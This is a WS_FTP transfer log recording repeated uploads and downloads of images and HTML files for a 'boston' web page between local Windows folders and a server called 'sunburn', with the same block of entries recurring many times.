10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
